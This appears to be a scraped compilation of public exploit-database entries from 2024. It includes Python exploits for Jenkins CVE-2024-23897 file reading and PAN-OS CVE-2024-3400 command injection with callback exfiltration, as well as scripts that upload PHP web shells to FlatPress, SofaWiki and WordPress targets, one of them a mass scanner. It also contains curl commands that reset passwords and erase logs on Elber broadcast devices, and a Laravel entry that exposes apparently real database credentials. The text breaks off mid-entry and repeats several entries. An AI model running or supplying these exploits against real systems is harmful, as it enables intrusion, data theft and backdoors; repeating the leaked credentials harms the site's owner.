ISHACK AI BOT

# Exploit Title: Jenkins 2.441 - Local File Inclusion # Date: 14/04/2024 # Exploit Author: Matisse Beckandt (Backendt) # Vendor Homepage: https://www.jenkins.io/ # Software Link: https://github.com/jenkinsci/jenkins/archive/refs/tags/jenkins-2.441.zip # Version: 2.441 # Tested on: Debian 12 (Bookworm) # CVE: CVE-2024-23897 from argparse import ArgumentParser from requests import Session, post, exceptions from threading import Thread from uuid import uuid4 from time import sleep from re import findall class Exploit(Thread): def __init__(self, url: str, identifier: str): Thread.__init__(self) self.daemon = True self.url = url self.params = {"remoting": "false"} self.identifier = identifier self.stop_thread = False self.listen = False def run(self): while not self.stop_thread: if self.listen: self.listen_and_print() def stop(self): self.stop_thread = True def receive_next_message(self): self.listen = True def wait_for_message(self): while self.listen: sleep(0.5) def print_formatted_output(self, output: str): if "ERROR: No such file" in output: print("File not found.") elif "ERROR: Failed to parse" in output: print("Could not read file.") expression = "No such agent \"(.*)\" exists." results = findall(expression, output) print("\n".join(results)) def listen_and_print(self): session = Session() headers = {"Side": "download", "Session": self.identifier} try: response = session.post(self.url, params=self.params, headers=headers) except (exceptions.ConnectTimeout, exceptions.ConnectionError): print("Could not connect to target to setup the listener.") exit(1) self.print_formatted_output(response.text) self.listen = False def send_file_request(self, filepath: str): headers = {"Side": "upload", "Session": self.identifier} payload = get_payload(filepath) try: post(self.url, data=payload, params=self.params, headers=headers, timeout=4) except (exceptions.ConnectTimeout, exceptions.ConnectionError): print("Could not connect to the target to send the request.") exit(1) def read_file(self, filepath: str): self.receive_next_message() sleep(0.1) self.send_file_request(filepath) self.wait_for_message() def get_payload_message(operation_index: int, text: str) -> bytes: text_bytes = bytes(text, "utf-8") text_size = len(text_bytes) text_message = text_size.to_bytes(2) + text_bytes message_size = len(text_message) payload = message_size.to_bytes(4) + operation_index.to_bytes(1) + text_message return payload def get_payload(filepath: str) -> bytes: arg_operation = 0 start_operation = 3 command = get_payload_message(arg_operation, "connect-node") poisoned_argument = get_payload_message(arg_operation, f"@{filepath}") payload = command + poisoned_argument + start_operation.to_bytes(1) return payload def start_interactive_file_read(exploit: Exploit): print("Press Ctrl+C to exit") while True: filepath = input("File to download:\n> ") filepath = make_path_absolute(filepath) exploit.receive_next_message() try: exploit.read_file(filepath) except exceptions.ReadTimeout: print("Payload request timed out.") def make_path_absolute(filepath: str) -> str: if not filepath.startswith('/'): return f"/proc/self/cwd/{filepath}" return filepath def format_target_url(url: str) -> str: if url.endswith('/'): url = url[:-1] return f"{url}/cli" def get_arguments(): parser = ArgumentParser(description="Local File Inclusion exploit for CVE-2024-23897") parser.add_argument("-u", "--url", required=True, help="The url of the vulnerable Jenkins service. Ex: http://helloworld.com/") parser.add_argument("-p", "--path", help="The absolute path of the file to download") return parser.parse_args() def main(): args = get_arguments() url = format_target_url(args.url) filepath = args.path identifier = str(uuid4()) exploit = Exploit(url, identifier) exploit.start() if filepath: filepath = make_path_absolute(filepath) exploit.read_file(filepath) exploit.stop() return try: start_interactive_file_read(exploit) except KeyboardInterrupt: pass print("\nQuitting") exploit.stop() if __name__ == "__main__": main()

# Exploit Title: OpenClinic GA 5.247.01 - Path Traversal (Authenticated) # Date: 2023-08-14 # Exploit Author: V. B. # Vendor Homepage: https://sourceforge.net/projects/open-clinic/ # Software Link: https://sourceforge.net/projects/open-clinic/ # Version: OpenClinic GA 5.247.01 # Tested on: Windows 10, Windows 11 # CVE: CVE-2023-40279 # Details An issue was discovered in OpenClinic GA version 5.247.01, where an attacker can perform a directory path traversal via the 'Page' parameter in a GET request to 'main.do'. This vulnerability allows for the retrieval and execution of files from arbitrary directories. # Proof of Concept (POC) Steps to Reproduce: - Crafting the Malicious GET Request: - Utilize a web browser or a tool capable of sending custom HTTP requests, such as curl or Burp Suite. - Format the GET request as follows (in this example, `../../main.jsp` is used to attempt directory traversal to access `main.jsp`): GET /openclinic/main.do?Page=../../main.jsp HTTP/1.1 Host: 192.168.100.5:10088 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Connection: close Cookie: JSESSIONID=[SESSION ID] Cache-Control: max-age=0 2. Confirming the Vulnerability: - Send the crafted GET request to the target server. - If the server responds with the content of the requested file (e.g., `main.jsp`) from outside the intended directory, it confirms the presence of a directory path traversal vulnerability. - This vulnerability can lead to sensitive information disclosure or more severe attacks.

# Exploit Title: Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation # Date: 21 Apr 2024 # Exploit Author: Kr0ff # Vendor Homepage: https://security.paloaltonetworks.com/CVE-2024-3400 # Software Link: - # Version: PAN-OS 11.1 < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3 # PAN-OS 11.0 < 11.0.0-h3, < 11.0.1-h4, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1 # PAN-OS 10.2 < 10.2.0-h3, < 10.2.1-h2, < 10.2.2-h5, < 10.2.3-h13, < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1 # Tested on: Debian # CVE : CVE-2024-3400 #!/usr/bin/env python3 import sys try: import argparse import requests except ImportError: print("Missing dependencies, either requests or argparse not installed") sys.exit(2) # https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis # https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ def check_vuln(target: str, file: str) -> bool: ret = False uri = "/ssl-vpn/hipreport.esp" s = requests.Session() r = "" headers = { "User-Agent" : \ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0 "Content-Type": "application/x-www-form-urlencoded", "Cookie": \ f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}" } headers_noCookie = { "User-Agent" : \ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0 } if not "http://" or not "https://" in target: target = "http://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTP\" !{e}") print("Trying with \"HTTPS\"...") target = "https://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTPS\"") sys.exit(1) else: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) if r.status_code == 200: r = s.get( (target + f"/global-protect/portal/images/{file}"), verify=False, headers=headers_noCookie, timeout=10 ) if r.status_code == 403: print("Target vulnerable to CVE-2024-3400") ret = True else: return ret return ret def cmdexec(target: str, callback_url: str, payload: str) -> bool: ret = False p = "" if " " in payload: p = payload.replace(" ", "${IFS)") uri = "/ssl-vpn/hipreport.esp" headers = { "User-Agent" : \ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0 "Content-Type": "application/x-www-form-urlencoded", "Cookie": \ f"SESSID=../../../../opt/panlogs/tmp/device_telemetry/minute/attack782`{callback_url}?r=$({payload})`" } s = requests.Session() r = "" if not "http://" or not "https://" in target: target = "http://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTP\" !{e}") print("Trying with \"HTTPS\"...") target = "https://" + target try: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) except requests.exceptions.Timeout or requests.ConnectionError as e: print(f"Request timed out for \"HTTPS\"") sys.exit(1) else: r = s.post( (target + uri), verify=False, headers=headers, timeout=10 ) if not "Success" in r.text: return ret else: ret = True return ret #Initilize parser for arguments def argparser(selection=None): parser = argparse.ArgumentParser( description='CVE-2024-3400 - Palo Alto OS Command Injection' ) subparser = parser.add_subparsers( help="Available modules", dest="module") exploit_subp = subparser.add_parser( "exploit", help="Exploit module of script") exploit_subp.add_argument( "-t", "--target",help="Target to send payload to", required=True ) exploit_subp.add_argument( "-p", "--payload", help="Payload to send (e.g: whoami)", required=True ) exploit_subp.add_argument( "-c", "--callbackurl", help="The callback url such as burp collaborator or similar", required=True ) #--------------------------------------- check_subp = subparser.add_parser( "check", help="Vulnerability check module of script" ) check_subp.add_argument( "-t", "--target", help="Target to check if vulnerable", required=True ) check_subp.add_argument( "-f", "--filename", help="Filename of the payload (e.g \"exploitCheck.exp\"", required=True ) args = parser.parse_args(selection) args = parser.parse_args(args=None if sys.argv[1:] else ["-h"]) if args.module == "exploit": cmdexec(args.target, args.callbackurl, args.payload) if args.module == "check": check_vuln(args.target, args.filename) if __name__ == "__main__": argparser() print("Finished !")

# Exploit Title: FlatPress v1.3 - Remote Command Execution # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 19.04.2024 # Vendor Homepage: https://www.flatpress.org # Software Link: https://github.com/flatpressblog/flatpress/archive/1.3.zip # Tested Version: 1.3 (latest) # Tested on: MacOS import requests import time import random import string def random_string(length=5): """Rastgele bir string oluşturur.""" letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def login_and_upload(base_url, username, password): filename = random_string() + ".php" login_url = f"http://{base_url}/login.php" upload_url = f"http://{base_url}/admin.php?p=uploader&action=default" with requests.Session() as session: # Exploiting print("Exploiting...") time.sleep(1) # Giriş yapma denemesi login_data = { 'user': username, 'pass': password, 'submit': 'Login' } print("Logging in...") response = session.post(login_url, data=login_data) time.sleep(1) if "Logout" in response.text: print("Login Successful!") else: print("Login Failed!") print(response.text) return # Dosya yükleme denemesi print("Shell uploading...") time.sleep(1) # Form verileri ve dosyalar files = { 'upload[]': (filename, '<?=`$_GET[0]`?>', 'text/php'), } form_data = { '_wpnonce': '9e0ed04260', '_wp_http_referer': '/admin.php?p=uploader', 'upload': 'Upload' } response = session.post(upload_url, files=files, data=form_data) if "File(s) uploaded" in response.text or "Upload" in response.text: shell_url = f"http://{base_url}/fp-content/attachs/{filename}" print(f"Your Shell is Ready: {shell_url}") time.sleep(1) print(f"Shell Usage: {shell_url}?0=command") else: print("Exploit Failed!") print(response.status_code, response.text) # Örnek kullanım: python script.py siteadi.com username password if __name__ == "__main__": import sys if len(sys.argv) != 4: print("Usage: script.py <base_url> <username> <password>") else: base_url, username, password = sys.argv[1:] login_and_upload(base_url, username, password)

# Exploit Title: Wordpress Plugin Background Image Cropper v1.2 - Remote Code Execution # Date: 2024-04-16 # Author: Milad Karimi (Ex3ptionaL) # Contact: [email protected] # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL # Vendor Homepage: https://wordpress.org # Software Link: https://wordpress.org/plugins/background-image-cropper/ # Version: 1.2 # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) shell = """<?php echo "Ex3ptionaL"; echo "<br>".php_uname()."<br>"; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\') exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/background-image-cropper/ups.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if 'enctype="multipart/form-data" name="uploader" id="uploader"><input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('Shells.txt', 'a').write(url + '/wp-content/plugins/background-image-cropper/ups.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) except : print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(150) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in LOL.txt'.format(fc)

# Exploit Title: SofaWiki 3.9.2 - Remote Command Execution (RCE) (Authenticated) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 18.04.2024 # Vendor Homepage: https://www.sofawiki.com # Software Link: https://www.sofawiki.com/site/files/snapshot.zip # Tested Version: v3.9.2 (latest) # Tested on: MacOS import requests import random import sys import time def main(): if len(sys.argv) < 4: print("Usage: python exploit.py <base_url> <username> <password>") sys.exit(1) base_url, username, password = sys.argv[1:4] filename = f"{random.randint(10000, 99999)}.phtml" session = requests.Session() login_url = f"{base_url}/index.php" login_data = { "submitlogin": "Login", "username": username, "pass": password, "name": "SofaWiki", "action": "login" } print("Exploiting...") time.sleep(1) response = session.post(login_url, data=login_data) if "Logout" not in response.text: print("Login failed:", response.text) sys.exit() print("Login Successful") time.sleep(1) php_shell_code = """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> </html> """ print("Shell uploading...") time.sleep(1) upload_url = f"{base_url}/index.php" files = { "uploadedfile": (filename, php_shell_code, "text/php"), "action": (None, "uploadfile"), "MAX_FILE_SIZE": (None, "8000000"), "filename": (None, filename), "content": (None, "content") } response = session.post(upload_url, files=files) if response.status_code == 200: print(f"Your shell is ready: {base_url}/site/files/{filename}") else: print("Upload failed:", response.text) if __name__ == "__main__": main()

# Exploit Title: Laravel Framework 11 - Credential Leakage # Google Dork: N/A # Date: [2024-04-19] # Exploit Author: Huseein Amer # Vendor Homepage: [https://laravel.com/] # Software Link: N/A # Version: 8.* - 11.* (REQUIRED) # Tested on: [N/A] # CVE : CVE-2024-29291 Proof of concept: Go to any Laravel-based website and navigate to storage/logs/laravel.log. Open the file and search for "PDO->__construct('mysql:host=". The result: shell Copy code #0 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70): PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) #1 /home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46): Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0', Array) Credentials: Username: u429384055_jscv Password: Jaly$$a0p0p0p0 Host: sql1...

# Exploit Title: Flowise 1.6.5 - Authentication Bypass # Date: 17-April-2024 # Exploit Author: Maerifat Majeed # Vendor Homepage: https://flowiseai.com/ # Software Link: https://github.com/FlowiseAI/Flowise/releases # Version: 1.6.5 # Tested on: mac-os # CVE : CVE-2024-31621 The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability. The code snippet this.app.use((req, res, next) => { > if (req.url.includes('/api/v1/')) { > whitelistURLs.some((url) => req.url.includes(url)) ? > next() : basicAuthMiddleware(req, res, next) > } else next() > }) puts authentication middleware for all the endpoints with path /api/v1 except a few whitelisted endpoints. But the code does check for the case sensitivity hence only checks for lowercase /api/v1 . Anyone modifying the endpoints to uppercase like /API/V1 can bypass the authentication. *POC:* curl http://localhost:3000/Api/v1/credentials For seamless authentication bypass. Use burpsuite feature Match and replace rules in proxy settings. Add rule Request first line api/v1 ==> API/V1

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned and configured in 1+1 seamless switching for redundancy. Redundancy can also be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II audio codec, providing analog and digital outputs; moreover, it’s possible to set a data PID to be decoded and passed to the internal RDS encoder, generating the dual MPX FM output. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5814 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5814.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.999 Revision 1243 1.317 Revision 602 1.220 Revision 1250 1.220 Revision 1248_1249 1.220 Revision 597 1.217 Revision 1242 1.214 Revision 1023 1.193 Revision 924 1.175 Revision 873 1.166 Revision 550 Summary: The SIGNUM controller from Elber satellite equipment demodulates one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving 256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned and configured in 1+1 seamless switching for redundancy. Redundancy can also be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II audio codec, providing analog and digital outputs; moreover, it’s possible to set a data PID to be decoded and passed to the internal RDS encoder, generating the dual MPX FM output. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5815 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customer may chose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications. Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5816 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5816.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)

Elber Cleber/3 Broadcast Multi-Purpose Platform 1.0.0 Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 1.0.0 Revision 7304 1.0.0 Revision 7284 1.0.0 Revision 6505 1.0.0 Revision 6332 1.0.0 Revision 6258 XS2DAB v1.50 rev 6267 Summary: Cleber offers a powerful, flexible and modular hardware and software platform for broadcasting and contribution networks where customers can install up to six boards with no limitations in terms of position or number. Based on a Linux embedded OS, it detects the presence of the boards and shows the related control interface to the user, either through web GUI and Touchscreen TFT display. Power supply can be single (AC and/or DC) or dual (hot swappable for redundancy); customer may chose between two ranges for DC sources, that is 22-65 or 10-36 Vdc for site or DSNG applications. Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5817 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5817.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0' RX Config Applied Successfully # Show factory window and FPGA upload (Console) > cleber_show_factory_wnd() # Etc.

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Authentication Bypass Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 0.01 Revision 0 Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed by a basic chassis with 4 extractable boards which makes maintenance and critical operations, like frequency modification, easy and efficient. The modular approach has brought to the development of the digital processing module (containing modulator, demodulator and data interface) and the RF module (containing Transmitter, Receiver and channel filters). From an RF point of view, the new transmission circuitry is able to guarantee around 1 Watt with every modulation scheme, introducing, in addition, wideband precorrection (up to 1GHz depending on frequency band). Desc: The device suffers from an authentication bypass vulnerability through a direct and unauthorized access to the password management functionality. The issue allows attackers to bypass authentication by manipulating the set_pwd endpoint that enables them to overwrite the password of any user within the system. This grants unauthorized and administrative access to protected areas of the application compromising the device's system security. -------------------------------------------------------------------------- /modules/pwd.html ------------------ 50: function apply_pwd(level, pwd) 51: { 52: $.get("json_data/set_pwd", {lev:level, pass:pwd}, 53: function(data){ 54: //$.alert({title:'Operation',text:data}); 55: show_message(data); 56: }).fail(function(error){ 57: show_message('Error ' + error.status, 'error'); 58: }); 59: } -------------------------------------------------------------------------- Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5818 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5818.php 18.08.2023 -- $ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234 Ref (lev param): Level 7 = SNMP Write Community (snmp_write_pwd) Level 6 = SNMP Read Community (snmp_read_pwd) Level 5 = Custom Password? hidden. (custom_pwd) Level 4 = Display Password (display_pwd)? Level 2 = Administrator Password (admin_pwd) Level 1 = Super User Password (puser_pwd) Level 0 = User Password (user_pwd)

Elber Reble610 M/ODU XPIC IP-ASI-SDH Microwave Link Device Config Vendor: Elber S.r.l. Product web page: https://www.elber.it Affected version: 0.01 Revision 0 Summary: The REBLE610 features an accurate hardware design, absence of internal cabling and full modularity. The unit is composed by a basic chassis with 4 extractable boards which makes maintenance and critical operations, like frequency modification, easy and efficient. The modular approach has brought to the development of the digital processing module (containing modulator, demodulator and data interface) and the RF module (containing Transmitter, Receiver and channel filters). From an RF point of view, the new transmission circuitry is able to guarantee around 1 Watt with every modulation scheme, introducing, in addition, wideband precorrection (up to 1GHz depending on frequency band). Desc: The device suffers from an unauthenticated device configuration and client-side hidden functionality disclosure. Tested on: NBFM Controller embOS/IP Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2024-5819 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5819.php 18.08.2023 -- # Config fan $ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp=' Configuration applied # Delete config $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2' File delete successfully # Launch upgrade $ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1' Upgrade launched Successfully # Log erase $ curl 'http://TARGET/json_data/erase_log.js?until=-2' Logs erased # Until: # =0 ALL # =-2 Yesterday # =-8 Last week # =-15 Last two weeks # =-22 Last three weeks # =-31 Last month # Set RX config $ curl 